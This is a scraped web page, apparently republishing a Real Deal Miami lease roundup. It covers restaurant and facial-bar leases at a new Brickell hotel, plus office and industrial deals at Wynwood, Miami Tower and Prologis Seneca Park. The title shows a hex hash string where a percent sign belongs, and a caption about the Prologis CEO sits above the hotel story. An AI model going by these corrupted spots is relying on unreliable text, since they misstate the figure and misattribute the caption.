.twp-close-icon-section{height:30px;position:absolute;right:0;top:50%;transform:translateY(-50%)}.site-title,.site-description{position:absolute;clip:rect(1px,1px,1px,1px)}#amp-mobile-version-switcher{left:0;position:absolute;width:100%;z-index:100}#amp-mobile-version-switcher>a{background-color:#444;border:0;color:#eaeaea;display:block;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:16px;font-weight:600;padding:15px 0;text-align:center;-webkit-text-decoration:none;text-decoration:none}#amp-mobile-version-switcher>a:active,#amp-mobile-version-switcher>a:focus,#amp-mobile-version-switcher>a:hover{-webkit-text-decoration:underline;text-decoration:underline}.cookielawinfo-column-1{width:25%}.cookielawinfo-column-3{width:15%}.cookielawinfo-column-4{width:50%}table.cookielawinfo-winter{font:85% "Lucida Grande","Lucida Sans Unicode","Trebuchet MS",sans-serif;padding:0;margin:10px 0 20px;border-collapse:collapse;color:#333;background:#f3f5f7}table.cookielawinfo-winter a{color:#3a4856;text-decoration:none;border-bottom:1px solid #c6c8cb}table.cookielawinfo-winter a:visited{color:#777}table.cookielawinfo-winter a:hover{color:#000}table.cookielawinfo-winter thead th{background:#3a4856;padding:15px 10px;color:#fff;text-align:left;font-weight:normal}table.cookielawinfo-winter tbody{border-left:1px solid #eaecee;border-right:1px solid #eaecee}table.cookielawinfo-winter tbody{border-bottom:1px solid #eaecee}table.cookielawinfo-winter tbody td,table.cookielawinfo-winter tbody th{padding:10px;background:url("https://sdbis.com/wp-content/plugins/cookie-law-info/legacy/images/td_back.gif") repeat-x;text-align:left}table.cookielawinfo-winter tbody tr{background:#f3f5f7}table.cookielawinfo-winter tbody tr:hover{background:#eaecee;color:#111}@media (max-width:800px){table.cookielawinfo-row-cat-table td,table.cookielawinfo-row-cat-table th{width:23%;font-size:12px;word-wrap:break-word}table.cookielawinfo-row-cat-table .cookielawinfo-column-4{width:45%}}.cookielawinfo-row-cat-table{width:99%;margin-left:5px}.amp-wp-bf126db:not(#_#_#_#_#_){visibility:hidden;position:absolute;left:-9999px;overflow:hidden}.amp-wp-1cec2f6:not(#_#_#_#_#_){height:1px}.amp-wp-baaeb4e:not(#_#_#_#_#_){width:715px}.amp-wp-017c068:not(#_#_#_#_#_){display:flex;align-items:center;width:35px;height:30px;justify-content:center;direction:ltr}.amp-wp-0f296dc:not(#_#_#_#_#_){fill:#999;color:#999}.amp-wp-ceb598f:not(#_#_#_#_#_){margin:0px 5px 0px 0px} /*# sourceURL=amp-custom.css */</style><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="alternate" type="application/rss+xml" title="SDBIS » Feed" href="https://sdbis.com/feed"><link rel="https://api.w.org/" href="https://sdbis.com/wp-json/"><link rel="alternate" type="application/json" href="https://sdbis.com/wp-json/wp/v2/posts/1666"><link rel="shortlink" href="https://sdbis.com/?p=1666"><link rel="alternate" type="application/json+oembed" href="https://sdbis.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fsdbis.com%2Fnew-brickell-hotel-leases-over-50-of-retail-space.html"><link rel="alternate" type="text/xml+oembed" href="https://sdbis.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fsdbis.com%2Fnew-brickell-hotel-leases-over-50-of-retail-space.html&format=xml"><link rel="apple-touch-icon" href="https://sdbis.com/wp-content/uploads/2021/09/cropped-default-1-180x180.png"><title>New Brickell Hotel Leases Over 50{352461131e134de422042936fefa1ec7b3be3957215d9cdd4e62cdd9b65caf90} of Retail Space – SDBIS

New Brickell Hotel Leases Over 50{352461131e134de422042936fefa1ec7b3be3957215d9cdd4e62cdd9b65caf90} of Retail Space

Robert Roffulo

Prologis CEO Hamid Moghadam (Prologis, CBRE, iStock) UPDATED, Jan. 24, 10:13 a.m.: AC Hotel by Marriott / Element by Westin I Brickell More than half of the street-level retail space is taken at the recently opened, dual-branded AC Hotel by Marriott/Element by Westin hotel in Miami’s Brickell neighborhood. Three eateries […]

Prologis CEO Hamid Moghadam (Prologis, CBRE, iStock)

UPDATED, Jan. 24, 10:13 a.m.: AC Hotel by Marriott / Element by Westin I Brickell

More than half of the street-level retail space is taken at the recently opened, dual-branded AC Hotel by Marriott/Element by Westin hotel in Miami’s Brickell neighborhood.

Three eateries and one facial bar inked the deals, according to a news release from hotel developers Robert Finvarb Companies and Tony Cho.

Cho is founder and chair of Metro 1, a brokerage involved in some of the deals.

Mexican restaurant and bar Toro signed a 4,500-square-foot lease; speakeasy piano bar Il Piano signed a 1,900-square-foot lease; and Venezuelan family owned bakery La Suiza Bakehouse signed an 850-square-foot lease, the release says.

Silver Mirror, a facial bar, signed a 1,700-square-foot lease, marking its first Miami location. The business already has New York City and Washington, D.C., outposts.

Julian Acosta of Keller Williams represented Toro in its deal. Valentina Grajales of Fortune International Realty represented Il Piano. Hector Antunez of Metro 1 and Luis Maggi of Prime Sunshine represented La Suiza, and Ana Barcelo of SRG Retail Group represented Silver Mirror.

Metro 1’s Juan Andres Nava and Bernardita Banfi represented the Robert Finvarb Companies and Cho.

Robert Finvarb, through his Miami-based company founded in 2002, has developed and invested in real estate in South Florida and beyond, building projects of more than $1 billion in market value, according to the firm’s website.

Finvarb and Cho’s 22-story AC by Marriott-Element by Westin hotel at 115 Southwest Eighth Street in Miami consists of 4,683 square feet of meeting space; a Rosa Sky Rooftop Bar & Lounge, managed by The Restaurant People; and 22,500 square feet of retail space — 10,500 square feet of which is still available, according to the release.

The hotel has 264 keys, which break down to 156 as part of the AC brand, and 108 as part of Element by Westin. It opened this month, after scoring a $67 million construction loan in 2019.

The property is near Brickell City Centre and the 10-mile Underline linear park that is under construction and will run underneath the Metrorail tracks in parts of Miami-Dade County.

OpenStore I The Gateway at Wynwood

OpenStore, the tech e-commerce joint venture backed by Founders Fund and Atomic, moved into the newly built Gateway at Wynwood.

OpenStore leased a 14,914-square-foot space on the 10th floor of the 13-story office building at 2916 North Miami Avenue in Miami, according to a news release from Gateway developer R & B Realty Group.

Stephen Rutchik and Tom Farmer were part of the Colliers team that represented R & B Realty. Adam Bernstein and Jeffrey Gordon of JLL represented OpenStore.

OpenStore buys Shopify businesses, and then uses its software in an effort to boost sales, according to media reports. Keith Rabois, general partner of venture capital firm Founders Fund; Jack Abraham, founder of startup and investment fund Atomic; and Michael Rubenstein, the former president of AppNexus, founded OpenStore.

In June, OpenStore raised $30 million in Series A funding, reaching a valuation of $250 million, and also raised $75 million in Series B funding, according to a November Forbes report.

OpenStore is the first tenant to move into The Gateway at Wynwood, but not the first to ink a lease. Oncology biopharmaceutical company Veru signed an eight-year lease, 12,155-square-foot lease for its global headquarters at the building.

The 10th floor of the Kobi Karp-designed Gateway at Wynwood is devoted to spec suites, designed by Gensler, that are fully built-out and move-in ready, according to the release. The spec suites, which now are being expanded to the ninth floor, start at 2,000 square feet but can be combined for bigger units.

OpenStore’s move is another sign that new-to-market tech and financial companies are making Wynwood their home. Previously, OpenStore along with Founders Fund and Atomic leased a combined 22,000 square feet at the Wynwood Annex. The three signed the lease in 2021, making them part of the first wave of tech and financial firms to open in Wynwood. Founders Fund and Atomic remain at Wynwood Annex.

Pardo Jackson Gainsburg I downtown Miami

Pardo Jackson Gainsburg inked a 6,000-square-foot lease at the Miami Tower in downtown Miami, marking an expansion of the law firm’s previous space.

Pardo Jackson recently moved into its 20th-floor offices from its former 4,000-square-foot space at 200 Southeast First Street, also in downtown Miami, according to a spokesperson for the law firm.

The 47-story Miami Tower is at 100 Southeast Second Street.

The expansion accounts for growth expected this year in Pardo Jackson’s real estate and construction practice, as well as its commercial litigation and bankruptcy workout groups, founder Stevan Pardo said in an emailed statement.

Pardo Jackson added one attorney and two support-staff members over the past year.

Jeg & Sons I Prologis Seneca Park in Pembroke Park

Prolific industrial developer and investor Prologis has signed another tenant at its Seneca development in Pembroke Park, bringing the project to full occupancy.

An electronics e-commerce tenant inked a 57,929-square-foot lease at Prologis Seneca Park, according to a news release from CBRE, which represented the landlord.

The release did not identify the tenant, but sources told The Real Deal it is Jeg & Sons, which currently owns its space west of Aventura.

Tom O’Loughlin and Larry Genet of CBRE represented Prologis, and Ana Rivera of JLL represented the tenant.

The master-planned, 1.1 million-square-foot Prologis Seneca Park will have eight buildings, with construction to start in 2022 in the final two, according to the release. The last two buildings will total 380,000 square feet and will have 32-foot clear ceiling heights, a rear load dock height configuration, Early Suppression, Fast Response sprinklers, LED lighting and spec office space.

San Francisco-based real estate investment trust Prologis has a nearly 2.9 million-square-foot portfolio in south Broward County. The deal at Seneca Park fills the final vacancy in its portfolio, according to the release.

In October, Prologis, led by Hamid Moghadam, sold two warehouses within the Weston Business Center to Nuveen Real Estate for $110 million.

Jonathan Guffey is Prologis’ market officer for Broward and Palm Beach counties.

Hefty bets by industrial behemoths like Prologis are coming as the South Florida market is booming, largely because of limited developable land and dwindling supply during a time of high demand.

https://therealdeal.com/miami/2022/01/24/lease-roundup-restaurant-speakeasy-bakery-ink-leases-at-new-brickell-hotel/

Next Post

Traveling by donkey power | News

While the donkeys Rick Ramseur has in his pasture probably wouldn’t be willing to pull the surrey that he recently refurbished, their ancestors did. “My grandfather, Richard Alexis Ramseur, was in the hardware business,” he said. “He took it over from his father. He always wanted to have a farm […]
Copyright sdbis.com WordPress Theme: Seek by ThemeInWP

Subscribe US Now

CookieDurationDescription
cookielawinfo-checkbox-analytics11 monthsThis cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Analytics".
cookielawinfo-checkbox-functional11 monthsThe cookie is set by GDPR cookie consent to record the user consent for the cookies in the category "Functional".
cookielawinfo-checkbox-necessary11 monthsThis cookie is set by GDPR Cookie Consent plugin. The cookies is used to store the user consent for the cookies in the category "Necessary".
cookielawinfo-checkbox-others11 monthsThis cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Other.
cookielawinfo-checkbox-performance11 monthsThis cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Performance".
viewed_cookie_policy11 monthsThe cookie is set by the GDPR Cookie Consent plugin and is used to store whether or not user has consented to the use of cookies. It does not store any personal data.
Functional
Performance
Analytics
Advertisement
Others